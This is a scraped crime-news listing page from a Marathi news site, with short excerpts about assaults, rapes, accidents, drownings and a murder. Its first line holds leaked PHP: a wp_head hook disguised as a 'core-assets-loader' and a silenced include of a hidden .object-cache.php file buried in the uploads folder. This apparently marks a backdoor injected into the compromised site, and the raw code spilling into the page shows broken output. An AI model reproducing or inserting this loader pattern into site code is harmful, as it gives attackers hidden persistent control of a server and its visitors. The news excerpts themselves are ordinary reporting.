add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

बलात्काराचा गुन्हा मागे घेण्यास नकार दिल्याने आरोपीने पीडित महिलेवर ज्वलनशील रासायनिक द्रव्याने हल्ला केल्याची घटना काशी मिरामध्ये घडली आहे. पोलिसांनी आरोपीला गुजरातमधून अटक केली असून पुढील तपास सुरु आहे. बाजारातून साहित्य घेऊन परतत असलेल्या महिलेला आरोपीने काशी-मिरा परिसरातील अदानी वीज कार्यालयासमोर गाठले. परिसरात शांतता असल्यामुळे मिरा रोड येथे राहणारा...

Read More

तुमसर तालुक्यातील पचारा येथे गावालगतच्या तलावात विद्यार्थ्यांचा मृतदेह आढळला. गुरुवारी दुपारी ही घटना उघडकीस आली. अमरान संजय मडावी (७) रा. पचारा ता. तुमसर असे मृत विद्यार्थ्यांचे नाव आहे. शाळेच्या स्नेहसंमेलनाच्या दिवशीच ही घटना समोर आल्याने स्नेहसंमेलन रद्द करण्यात आल्याचे मुख्याध्यापकांनी सांगितले. अमरान मडावी हा येरलीच्या आश्रमशाळेत पहिल्या वर्गात शिकत...

Read More

नाशिकमधील देवळा येथे बस आणि रिक्षाची धडक होऊन भीषण अपघात झाला आहे. अपघातानंतर बस आणि रिक्षा शेजारील शेतात असणाऱ्या विहिरीत जाऊन कोसळली. या अपघातात १० ते ११ जणांचा मृत्यू झाल्याची भीती व्यक्त करण्यात येत आहे. सात ते आठ जणांचा मृतदेह विहिरीतून बाहेर काढण्यात आले आहेत. अपघातग्रस्त बस मालेगावकडून कळवण...

Read More

अमेरिकेने भारताला चाईल्ड पॉर्नसंबंधी धक्कादायक आकडेवारी सोपवली आहे. अमेरिकेने भारतासोबत रिपोर्ट शेअर केला असून भारतात गेल्या पाच महिन्यात चाईल्ड पॉर्नशी संबंधित २५ हजार मटेरिअल वेगवेगळ्या सोशल मीडिया प्लॅटफॉर्मवर अपलोड करण्यात आलं आहे. ही आकडेवारी अमेरिकेच्या नॅशनन सेंटर फॉर मिसिंग अॅण्ड एक्स्प्लॉयटेड चिल्ड्रनने (NCMEC) भारताच्या नॅशनल क्राइम रेकॉर्ड ब्युरोकडे सोपवली...

Read More

पिंपरी-चिंचवड परिसरातील वाकड परिसरात दोन अज्ञात चोरांनी एटीएम फोडण्याचा प्रयत्न केला. अज्ञातांनी गॅस कटरच्या सहाय्याने एटीएम फोडण्याचा प्रयत्न केला. यामुळे एटीएममधील तब्बल आठ लाख रुपयांच्या नोटा जळून खाक झाल्या. ही घटना मध्यरात्री वाकड परिसरात घडली. संबंधित एटीएमम हे अॅक्सिस बँकेचे असून याप्रकरणी वाकड पोलीस ठाण्यात गुन्हा दाखल करण्यात आला...

Read More

फेसबुकवर ओळख झालेल्या दोन मित्रांच्या मदतीने पत्नीवर बलात्कार घडवून आणणाऱ्या पतीला जोगेश्वरी पोलिसांनी अटक केली. मुख्य आरोपी रिक्षा चालक असून, तो मुंबई शेजारच्या पालघर जिल्ह्यामध्ये राहतो. त्याचे दोन साथीदार मुंबईत एका फार्मा कंपनीमध्ये नोकरीला आहेत. रविवारी पोलिसांनी ही माहिती दिली. “आरोपीने चित्रपट दाखवण्याच्या बहाण्याने पत्नीला जोगेश्वरीला आणले. त्यानंतर तो...

Read More

एक कुख्यात गुंड कारागृहाबाहेर येताच त्याचा गळा चिरून खून करण्यात आला. ही घटना बजाजनगर पोलीस ठाण्याच्या हद्दीतील काचीपुरा परिसरात शनिवारी पहाटेच्या सुमारास घडली. खुनामागचे कारण अद्याप स्पष्ट झाले नसून आरोपीही अज्ञात आहेत. पण, खुनाचा बदला घेण्यासाठी हा खून करण्यात आला असावा, अशी शक्यता पोलीस वर्तुळात व्यक्त केली जात आहे....

Read More

मृत्यू झाल्याची घटना वलप गावात घडली. लव आणि अंकुश यादव (वय सहा वर्षे) अशी या मुलांची नावे आहेत. हे दोघेही खेळत असताना एकाचा तोल जाऊन तो खदानीतील पाण्यात पडला. त्याला वाचविण्याच्या प्रयत्नात दुसऱ्याचाही तोल गेल्याने तोही बुडाला. घटनेच्या काही मिनिटांनंतर शेजारच्या तरुणांनी या मुलांना पाण्याबाहेर काढले. त्यांना तातडीने पनवेल...

Read More

येथील पोलीस आयुक्तालयाच्या क्षेत्रात बेकायदा वास्तव्य करणाऱ्या १२४ विदेशी नागरिकांवर पारपत्र विभागाने कारवाई केली आहे. २०१८ ते २०१९ या काळात या परकीय नागरिकांनी घुसखोरी केली असून त्यात ५४ नागरिक आफ्रिका खंडातील, ७० नागरिक बांगलादेशी व उर्वरित विविध आठ देशांतील आहेत. नवी मुंबईत बेकायदा राहणाऱ्या बांगलादेशी आणि नायझेरियन नागरिकांचा वावर...

Read More

एका २२ वर्षीय एचआयव्हीग्रस्त महिलेवर एक्स्प्रेस गाडीच्या डब्यात दोघांनी बलात्कार केल्याची घटना उघड झाली आहे. ही सोमवारी रात्री पटना-भबुआ इंटरसिटी एक्स्प्रेसमध्ये घडला. या प्रकरणी दोन्ही आरोपींना अटक करण्यात आली आहे. पटना-भबुआ इंटरसिटी एक्स्प्रेस सोमवारी रात्री ११.५० च्या दरम्यान भबुआ रोड स्थानकात पोहोचल्यानंतर डब्यांची पाहणी करताना आरपीएफ आणि जीआरपीच्या जवानांना हा...

Read More